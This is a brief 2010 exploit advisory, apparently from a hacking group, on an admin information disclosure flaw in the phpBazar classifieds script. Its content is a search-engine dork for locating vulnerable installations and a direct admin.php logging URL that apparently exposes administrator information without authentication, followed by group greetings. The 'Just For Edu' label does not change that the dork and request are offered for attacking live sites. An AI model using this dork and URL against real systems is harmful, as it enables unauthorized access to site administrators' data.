1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
===================================== phpBazar admin information discloser Vulnerability ===================================== Author :: Net_Spy Group:: Aras cyber Army Email:: tvc82_2002@yahoo.com Discover :: 1 july 2010 Critical Lvl :: M Published:: 22 july 2010 Vendor :: http://www.smartisoft.com/ --------------------------------------------------------------------------- ~~~~~~~~~ Dork :: intitle: phpBazar-AdminPanel ~~~~~~~~~~~~~~~~~~ demo :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0 ~~~~~~~~~~~~~~~~~~~~~~~~~ Example Just For Edu :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +++++++++++++++++++++++++++++++++++++++ [!] greetiz to :: DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn All aras cyber amry members +++++++++++++++++++++++++++++++++++++++ |